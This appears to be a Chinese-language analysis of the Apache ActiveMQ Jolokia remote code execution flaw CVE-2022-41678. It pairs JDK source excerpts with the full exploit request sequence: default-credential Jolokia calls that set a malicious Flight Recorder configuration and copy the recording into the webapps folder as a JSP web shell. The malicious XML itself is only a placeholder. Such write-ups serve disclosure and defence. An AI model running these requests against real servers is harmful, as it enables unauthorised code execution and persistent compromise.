Apache ActiveMQ jolokia远程代码执行漏洞(CVE-2022-41678)

curl -XGET --user admin:admin --header "Origin: http://localhost" http://127.0.0.1:8161/api/jolokia/exec/jdk.management.jfr:type=FlightRecorder/newRecording/// 返回值中"value"值为该Record ID,后续利用需要

POST /api/jolokia HTTP/1.1host: 127.0.0.1:8161Origin: http://127.0.0.1:8161/* Basic Auth 信息 */{   "type":"EXEC",   "mbean":"jdk.management.jfr:type=FlightRecorder",   "operation":"setConfiguration",   "arguments":[1,"恶意XML"]}// 此处的1就是前面创建Record得到的Record ID

curl -XGET --user admin:admin --header "Origin: http://localhost" http://127.0.0.1:8161/api/jolokia/exec/jdk.management.jfr:type=FlightRecorder/startRecording/1

curl -XGET --user admin:admin --header "Origin: http://localhost" http://127.0.0.1:8161/api/jolokia/exec/jdk.management.jfr:type=FlightRecorder/stopRecording/1

POST /api/jolokia HTTP/1.1host: 127.0.0.1:8161Origin: http://127.0.0.1:8161/* Basic Auth 信息 */{   "type":"EXEC",   "mbean":"jdk.management.jfr:type=FlightRecorder",   "operation":"copyTo",   "arguments":[1,"../webapps/admin/msfcode.jsp"]}// 此处的1就是前面创建Record得到的Record ID

<servlet-mapping><servlet-name>jolokia-agent</servlet-name><url-pattern>/jolokia/*</url-pattern></servlet-mapping>
<servlet><servlet-name>jolokia-agent</servlet-name><servlet-class>org.jolokia.http.AgentServlet</servlet-class><!-- Uncomment this if you want jolokia multicast discovery to be enabled                 <init-param>          <param-name>discoveryEnabled</param-name>          <param-value>true</param-value>        </init-param>              <init-param>          <param-name>discoveryAgentUrl</param-name>          <param-value>http://${host}:8161/api/jolokia</param-value>        </init-param>        <init-param>          <param-name>agentDescription</param-name>          <param-value>Apache ActiveMQ</param-value>        </init-param>        --><!-- turn off returning exceptions and stacktraces from jolokia --><init-param><param-name>allowErrorDetails</param-name><param-value>false</param-value></init-param><load-on-startup>1</load-on-startup></servlet>

synchronized void start(PlatformRecording recording) {    // State can only be NEW or DELAYED because of previous checks    Instant now = Instant.now();    recording.setStartTime(now);    recording.updateTimer();    Duration duration = recording.getDuration();    if (duration != null) {        recording.setStopTime(now.plus(duration));    }    boolean toDisk = recording.isToDisk();    boolean beginPhysical = true;    for (PlatformRecording s : getRecordings()) {        if (s.getState() == RecordingState.RUNNING) {            beginPhysical = false;            if (s.isToDisk()) {                toDisk = true;            }        }    }    if (beginPhysical) {        RepositoryChunk newChunk = null;        if (toDisk) {            newChunk = repository.newChunk(now);            MetadataRepository.getInstance().setOutput(newChunk.getUnfishedFile().toString());        } else {            MetadataRepository.getInstance().setOutput(null);        }        currentChunk = newChunk;        jvm.beginRecording_();        recording.setState(RecordingState.RUNNING);        updateSettings();        writeMetaEvents();    } else {        RepositoryChunk newChunk = null;        if (toDisk) {            newChunk = repository.newChunk(now);            RequestEngine.doChunkEnd();            MetadataRepository.getInstance().setOutput(newChunk.getUnfishedFile().toString());        }        recording.setState(RecordingState.RUNNING);        updateSettings();        writeMetaEvents();        if (currentChunk != null) {            // 此处调用该方法将currentChunk添加到jdk.jfr.internal.PlatformRecording#chunks中            finishChunk(currentChunk, now, recording);        }        currentChunk = newChunk;    }
    RequestEngine.doChunkBegin();}

private void finishChunk(RepositoryChunk chunk, Instant time, PlatformRecording ignoreMe) {    chunk.finish(time);    for (PlatformRecording r : getRecordings()) {        if (r != ignoreMe && r.getState() == RecordingState.RUNNING) {            r.appendChunk(chunk);        }    }}

void appendChunk(RepositoryChunk chunk) {    if (!chunk.isFinished()) {        throw new Error("not finished chunk " + chunk.getStartTime());    }    synchronized (recorder) {        if (!toDisk) {            return;        }        if (maxAge != null) {            trimToAge(chunk.getEndTime().minus(maxAge));        }        chunks.addLast(chunk);        added(chunk);        trimToSize();    }}